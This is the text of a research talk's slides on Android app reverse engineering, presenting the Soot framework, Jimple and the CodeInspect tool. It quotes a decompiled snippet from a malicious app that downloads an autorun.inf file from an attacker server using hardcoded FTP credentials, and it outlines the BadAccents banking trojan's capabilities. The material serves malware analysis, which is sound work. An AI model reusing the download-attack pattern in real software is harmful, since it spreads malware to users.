Dismantling droids for breakfast - The current state of app reverse engineering Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP
#whoami • 3rd year PhD-Student at Secure Software Engineering Group Darmstadt, Germany (Prof. Dr. Eric Bodden) • Research interest: • Applied software security on Android • Static-/dynamic code analyses • Android Security: • Found 2 AOSP exploits • Security Analysis of Backend-as-a-Service • Korea Threat investigation together with McAfee Research Lab SECURE 2 SOFTWARE ENGINEERING GROUP
SECURE 3 SOFTWARE ENGINEERING GROUP
How easy is it to dismantle your app? SECURE 4 SOFTWARE ENGINEERING GROUP
How to secure my app against piracy I am developing an android app and I am planning to publish it (paid app). I have heard that it is very easy to pirate Android apps (much easier than iphone). I was wondering from your experience or what you know, how can increase the security of my app? I know that I can never get it 100% secured but I want to make it harder for people to pirate it or distribute it illegaly Any ideas, experiences, comments you can share? That will be greatly appreciated Best regards Source: stackoverflow.com SECURE 5 SOFTWARE ENGINEERING GROUP
Is it still easy to dismantle your app? SECURE 6 SOFTWARE ENGINEERING GROUP
A new Binary Analysis Framework for Android and Java Bytecode SECURE 7 SOFTWARE ENGINEERING GROUP
vs SECURE 8 SOFTWARE ENGINEERING GROUP
Soot SECURE 9 SOFTWARE ENGINEERING GROUP
Soot Input/Output .dex .java .jimple .class .apk Soot - Various callgraph algorithms - Sophisticated algorithms used in compiler construction - Code manipulation https://github.com/Sable/soot/wiki SECURE 10 SOFTWARE ENGINEERING GROUP
Jimple Soot SECURE 11 SOFTWARE ENGINEERING GROUP
Jimple Soot public static boolean UsbAutoRunAttack(android.content.Context $param0) { Declarations java.lang.String $String; $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>; ... staticinvoke <smart.apps.droidcleaner.Tools: boolean Code DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)> ($String, "autorun.inf", "ftpupper", "thisisshit007", $param0); Return-Statement return true; } SECURE 12 SOFTWARE ENGINEERING GROUP
CodeInspect Jimple Soot SECURE 13 SOFTWARE ENGINEERING GROUP
Jimple CodeInspect Soot Syntax Code Java Source Highlighting Refactoring Enhancement Jimple Code Code Debugger Readable Manipulation Files Dataflow “Region“ Deobfuscator Visualizer Detection SECURE 14 SOFTWARE ENGINEERING GROUP
Let’s get started… 1. Import APK 2. Start Device SECURE 15 SOFTWARE ENGINEERING GROUP
infected >20,000 user SECURE 16 SOFTWARE ENGINEERING GROUP
Android/BadAccents SMS SMS E-Mail E-Mail Install Install Tapjacking Activation Tapjacking Activation Uninstall AV Uninstall AV Fake AV Fake AV Attack Component Attack Component User User Intercept Call Intercept SMS Intercept SMS Intercept Call Banking Trojan Banking Trojan Send SMS Send SMS HTTP HTTP Native Code Native Code File System File System Waiting Time Waiting Time SECURE 17 SOFTWARE ENGINEERING GROUP
Live-Demo SECURE 18 SOFTWARE ENGINEERING GROUP
Future Steps • New Plugins under development • Easily add own analyses SECURE 19 SOFTWARE ENGINEERING GROUP
How do I get this tool? SECURE 20 SOFTWARE ENGINEERING GROUP
SECURE 21 SOFTWARE ENGINEERING GROUP
Siegfried Rasthofer Secure Software Engineering Group Email: siegfried.rasthofer@cased.de Blog: http://sse-blog.ec-spride.de Website: http://sse.ec-spride.de Twitter: @CodeInspect SECURE 22 SOFTWARE ENGINEERING GROUP
Recommend
More recommend